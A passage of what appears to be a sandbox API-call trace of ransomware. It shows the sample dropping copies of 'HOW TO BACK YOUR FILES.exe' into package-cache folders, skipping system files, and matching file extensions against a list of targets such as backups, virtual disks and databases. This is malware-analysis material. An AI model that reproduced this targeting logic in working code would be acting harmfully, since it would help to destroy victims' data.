Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0083.169] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.169] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.170] GetLastError () returned 0x0 [0083.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.170] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.170] CloseHandle (hObject=0x120) returned 1 [0083.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.170] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.171] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.171] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.171] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.171] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.171] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2c9ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.171] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.171] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="aoldtz.exe") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2=".") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="..") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="windows") returned -1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="bootmgr") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="temp") returned -1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="pagefile.sys") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="boot") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="ids.txt") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="ntuser.dat") returned 1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="perflogs") returned -1 [0083.171] lstrcmpiW (lpString1="Patch", lpString2="MSBuild") returned 1 [0083.171] lstrlenW (lpString="Patch") returned 5 [0083.171] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*") returned 84 [0083.171] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Patch" | out: lpString1="Patch") returned="Patch" [0083.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0083.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb2) returned 0x2f2fc8 [0083.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0083.171] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0083.171] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.172] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0083.172] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0083.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0083.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0083.172] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 88 [0083.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0083.172] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.172] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.172] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.172] GetLastError () returned 0x0 [0083.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.173] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.173] CloseHandle (hObject=0x120) returned 1 [0083.173] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.173] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.173] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.173] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.173] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.173] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.173] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.173] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.173] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.173] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2c9ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.173] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.173] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="aoldtz.exe") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2=".") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="..") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="windows") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="bootmgr") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="temp") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="pagefile.sys") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="boot") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="ids.txt") returned 1 [0083.173] lstrcmpiW (lpString1="x64", lpString2="ntuser.dat") returned 1 [0083.174] lstrcmpiW (lpString1="x64", lpString2="perflogs") returned 1 [0083.174] lstrcmpiW (lpString1="x64", lpString2="MSBuild") returned 1 [0083.174] lstrlenW (lpString="x64") returned 3 [0083.174] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*") returned 90 [0083.174] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="x64" | out: lpString1="x64") returned="x64" [0083.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0083.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x2cfda8 [0083.174] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0083.174] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0083.174] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.174] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0083.174] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0083.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0083.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0083.174] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 92 [0083.174] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0083.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.174] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.175] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.175] GetLastError () returned 0x0 [0083.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.175] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.175] CloseHandle (hObject=0x120) returned 1 [0083.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.175] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.175] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.175] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.175] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.175] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.175] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.175] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.175] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.175] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.175] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.175] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2c9ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.175] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.175] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0083.175] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="aoldtz.exe") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="..") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="bootmgr") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="temp") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="pagefile.sys") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="boot") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ids.txt") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ntuser.dat") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="perflogs") returned 1 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="MSBuild") returned 1 [0083.176] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.176] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*") returned 94 [0083.176] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="Windows6.1-KB2999226-x64.msu" | out: lpString1="Windows6.1-KB2999226-x64.msu") returned="Windows6.1-KB2999226-x64.msu" [0083.176] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.176] lstrlenW (lpString="Ares865") returned 7 [0083.176] lstrcmpiW (lpString1="x64.msu", lpString2="Ares865") returned 1 [0083.176] lstrlenW (lpString=".dll") returned 4 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".dll") returned 1 [0083.176] lstrlenW (lpString=".lnk") returned 4 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".lnk") returned 1 [0083.176] lstrlenW (lpString=".ini") returned 4 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".ini") returned 1 [0083.176] lstrlenW (lpString=".sys") returned 4 [0083.176] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".sys") returned 1 [0083.176] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.176] lstrlenW (lpString="bak") returned 3 [0083.176] lstrcmpiW (lpString1="msu", lpString2="bak") returned 1 [0083.176] lstrlenW (lpString="ba_") returned 3 [0083.176] lstrcmpiW (lpString1="msu", lpString2="ba_") returned 1 [0083.176] lstrlenW (lpString="dbb") returned 3 [0083.176] lstrcmpiW (lpString1="msu", lpString2="dbb") returned 1 [0083.176] lstrlenW (lpString="vmdk") returned 4 [0083.176] lstrcmpiW (lpString1=".msu", lpString2="vmdk") returned -1 [0083.176] lstrlenW (lpString="rar") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="rar") returned -1 [0083.177] lstrlenW (lpString="zip") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="zip") returned -1 [0083.177] lstrlenW (lpString="tgz") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="tgz") returned -1 [0083.177] lstrlenW (lpString="vbox") returned 4 [0083.177] lstrcmpiW (lpString1=".msu", lpString2="vbox") returned -1 [0083.177] lstrlenW (lpString="vdi") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="vdi") returned -1 [0083.177] lstrlenW (lpString="vhd") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="vhd") returned -1 [0083.177] lstrlenW (lpString="vhdx") returned 4 [0083.177] lstrcmpiW (lpString1=".msu", lpString2="vhdx") returned -1 [0083.177] lstrlenW (lpString="avhd") returned 4 [0083.177] lstrcmpiW (lpString1=".msu", lpString2="avhd") returned -1 [0083.177] lstrlenW (lpString="db") returned 2 [0083.177] lstrcmpiW (lpString1="su", lpString2="db") returned 1 [0083.177] lstrlenW (lpString="db2") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="db2") returned 1 [0083.177] lstrlenW (lpString="db3") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="db3") returned 1 [0083.177] lstrlenW (lpString="dbf") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="dbf") returned 1 [0083.177] lstrlenW (lpString="mdf") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="mdf") returned 1 [0083.177] lstrlenW (lpString="mdb") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="mdb") returned 1 [0083.177] lstrlenW (lpString="sql") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="sql") returned -1 [0083.177] lstrlenW (lpString="sqlite") returned 6 [0083.177] lstrcmpiW (lpString1="64.msu", lpString2="sqlite") returned -1 [0083.177] lstrlenW (lpString="sqlite3") returned 7 [0083.177] lstrcmpiW (lpString1="x64.msu", lpString2="sqlite3") returned 1 [0083.177] lstrlenW (lpString="sqlitedb") returned 8 [0083.177] lstrcmpiW (lpString1="-x64.msu", lpString2="sqlitedb") returned 1 [0083.177] lstrlenW (lpString="xml") returned 3 [0083.177] lstrcmpiW (lpString1="msu", lpString2="xml") returned -1 [0083.178] lstrlenW (lpString="$er") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="$er") returned 1 [0083.178] lstrlenW (lpString="4dd") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="4dd") returned 1 [0083.178] lstrlenW 